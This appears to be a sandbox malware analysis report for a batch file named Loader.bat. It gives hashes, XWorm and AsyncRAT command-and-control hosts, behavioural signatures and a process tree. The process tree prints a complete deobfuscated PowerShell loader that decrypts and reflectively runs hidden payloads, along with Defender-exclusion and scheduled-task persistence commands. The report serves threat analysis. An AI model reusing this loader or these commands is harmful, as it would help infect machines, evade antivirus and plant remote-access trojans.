Analysis
-
max time kernel
1045s -
max time network
1053s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
11/07/2024, 20:52
Static task
static1
General
-
Target
Loader.bat
-
Size
192KB
-
MD5
a94e4dec22b09ea37e33fdfa3638e5de
-
SHA1
f90c1ea98c741bc63a3260721d1974962b9241ce
-
SHA256
bb484dd134c649c660dbde9ceb4fe1fbac7e65fb934d8a9c288c1e86d1b189f4
-
SHA512
a747324043860c06f28d4d7880a1df9f2bfbc6563fd42dffa76f3425a123aeb9bef29a4706dd11851f25c58acbf0c2fdfed775d68e9cb888b88a77ff2c0c6e0b
-
SSDEEP
3072:GTv0B0ylSYSg4xt9mYNjvI6L41JOELI7m5Y+fk3T0dcZAIG0+BWtOy15c:Q0iyQC4xt4Y26c1kEU7uBuWMAISA5c
Malware Config
Extracted
xworm
unique-emotions.gl.at.ply.gg:54742
wiz.bounceme.net:6000
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
asyncrat
0.5.8
Default
card-buzz.gl.at.ply.gg:2497
rotrzgmheqhT
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/memory/1952-25-0x0000000007A20000-0x0000000007A4C000-memory.dmp family_xworm behavioral1/files/0x000200000001e78e-31.dat family_xworm behavioral1/memory/1556-40-0x0000000000310000-0x0000000000326000-memory.dmp family_xworm behavioral1/memory/1556-90-0x000000001C0C0000-0x000000001C0CE000-memory.dmp family_xworm -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/memory/1952-28-0x0000000007AE0000-0x0000000007AF2000-memory.dmp family_asyncrat -
Blocklisted process makes network request 41 IoCs
flow pid Process 17 1952 powershell.exe 46 1952 powershell.exe 53 1952 powershell.exe 62 1952 powershell.exe 67 1952 powershell.exe 70 1952 powershell.exe 73 1952 powershell.exe 77 1952 powershell.exe 79 1952 powershell.exe 82 1952 powershell.exe 85 1952 powershell.exe 92 1952 powershell.exe 97 1952 powershell.exe 105 1952 powershell.exe 109 1952 powershell.exe 112 1952 powershell.exe 115 1952 powershell.exe 120 1952 powershell.exe 123 1952 powershell.exe 125 1952 powershell.exe 129 1952 powershell.exe 132 1952 powershell.exe 138 1952 powershell.exe 141 1952 powershell.exe 146 1952 powershell.exe 151 1952 powershell.exe 154 1952 powershell.exe 157 1952 powershell.exe 161 1952 powershell.exe 164 1952 powershell.exe 167 1952 powershell.exe 171 1952 powershell.exe 177 1952 powershell.exe 180 1952 powershell.exe 184 1952 powershell.exe 187 1952 powershell.exe 191 1952 powershell.exe 196 1952 powershell.exe 198 1952 powershell.exe 205 1952 powershell.exe 208 1952 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 1952 powershell.exe 2380 powershell.exe 972 powershell.exe 3012 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation Update.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk Update.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk Update.exe -
Executes dropped EXE 18 IoCs
pid Process 1556 Update.exe 1348 Update.exe 2348 Update.exe 4104 Update.exe 4456 Update.exe 1520 Update.exe 1184 Update.exe 620 Update.exe 3384 Update.exe 216 Update.exe 4860 Update.exe 3408 Update.exe 3464 Update.exe 1700 Update.exe 3716 Update.exe 1256 Update.exe 4792 Update.exe 1756 Update.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe" Update.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3912 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1952 powershell.exe 1952 powershell.exe 2380 powershell.exe 2380 powershell.exe 972 powershell.exe 972 powershell.exe 3012 powershell.exe 3012 powershell.exe 1556 Update.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 1556 Update.exe Token: SeDebugPrivilege 2380 powershell.exe Token: SeDebugPrivilege 972 powershell.exe Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 1556 Update.exe Token: SeDebugPrivilege 1348 Update.exe Token: SeDebugPrivilege 2348 Update.exe Token: SeDebugPrivilege 4104 Update.exe Token: SeDebugPrivilege 4456 Update.exe Token: SeDebugPrivilege 1520 Update.exe Token: SeDebugPrivilege 1184 Update.exe Token: SeDebugPrivilege 620 Update.exe Token: SeDebugPrivilege 3384 Update.exe Token: SeDebugPrivilege 216 Update.exe Token: SeDebugPrivilege 4860 Update.exe Token: SeDebugPrivilege 3408 Update.exe Token: SeDebugPrivilege 3464 Update.exe Token: SeDebugPrivilege 1700 Update.exe Token: SeDebugPrivilege 3716 Update.exe Token: SeDebugPrivilege 1256 Update.exe Token: SeDebugPrivilege 4792 Update.exe Token: SeDebugPrivilege 1756 Update.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1556 Update.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2088 wrote to memory of 5016 2088 cmd.exe 88 PID 2088 wrote to memory of 5016 2088 cmd.exe 88 PID 2088 wrote to memory of 1952 2088 cmd.exe 89 PID 2088 wrote to memory of 1952 2088 cmd.exe 89 PID 2088 wrote to memory of 1952 2088 cmd.exe 89 PID 1952 wrote to memory of 1556 1952 powershell.exe 90 PID 1952 wrote to memory of 1556 1952 powershell.exe 90 PID 1556 wrote to memory of 2380 1556 Update.exe 91 PID 1556 wrote to memory of 2380 1556 Update.exe 91 PID 1556 wrote to memory of 972 1556 Update.exe 93 PID 1556 wrote to memory of 972 1556 Update.exe 93 PID 1556 wrote to memory of 3012 1556 Update.exe 95 PID 1556 wrote to memory of 3012 1556 Update.exe 95 PID 1556 wrote to memory of 3912 1556 Update.exe 97 PID 1556 wrote to memory of 3912 1556 Update.exe 97 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rP6ipY8ykCrcY/vqOWugxQ2mrpqqQx5JkOzMlDOKmOA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GH3abWd9uo3DMEDckKzwyw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BZojv=New-Object System.IO.MemoryStream(,$param_var); $jqKwU=New-Object System.IO.MemoryStream; $YBFLc=New-Object System.IO.Compression.GZipStream($BZojv, [IO.Compression.CompressionMode]::Decompress); $YBFLc.CopyTo($jqKwU); $YBFLc.Dispose(); $BZojv.Dispose(); $jqKwU.Dispose(); $jqKwU.ToArray();}function execute_function($param_var,$param2_var){ $HnXah=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ASDSB=$HnXah.EntryPoint; $ASDSB.Invoke($null, $param2_var);}$HxmrU = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$host.UI.RawUI.WindowTitle = $HxmrU;$YminX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HxmrU).Split([Environment]::NewLine);foreach ($LBczd in $YminX) { if ($LBczd.StartsWith('zyIAYTpLJuqqlwNwSYZB')) { $nGVNd=$LBczd.Substring(20); break; }}$payloads_var=[string[]]$nGVNd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:5016
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\Update.exe"C:\Users\Admin\AppData\Local\Temp\Update.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Update.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3912
-
-
-
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4456
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:620
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:216
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
C:\Users\Admin\AppData\Roaming\Update.exeC:\Users\Admin\AppData\Roaming\Update.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1756
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
948B
MD501d89dd05c27325bbfe34d7a2bc716ad
SHA1fa0a5ce95e7e989da44face5a736172aba834ddc
SHA25652bf1aacc2b2f03b2bbdca40b7eff5e041c8f2892575b3bf5cbaa000a02f71e9
SHA512d7500eae5877d297fec543b607a1e6764ac07002178e92306de9b5a9cc76d9f42cdaa9a2b086ed1d3174c660afa120228affa80a4fb1ac4a430f7028449e0adb
-
Filesize
948B
MD5083782a87bd50ffc86d70cbc6f04e275
SHA10c11bc2b2c2cf33b17fff5e441881131ac1bee31
SHA2567a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f
SHA512a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02
-
Filesize
59KB
MD507ac8571846ca0cc9f6fcdbe1d000be2
SHA13cbe16f7d24d40b590f97b1999c64c5bb889e8c6
SHA2562a3bcea7cadf94c65d4462b2297285078f5232e84267dfa641cb23475ffdb1b5
SHA51256413d14e5ee2e615c19232d93047c9d2cc422e083eda0f9f5ae1dc04798989e73d5ad80e06a7dda166deb0177206fb1ed045773bba3975667c12409d67d1e7e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82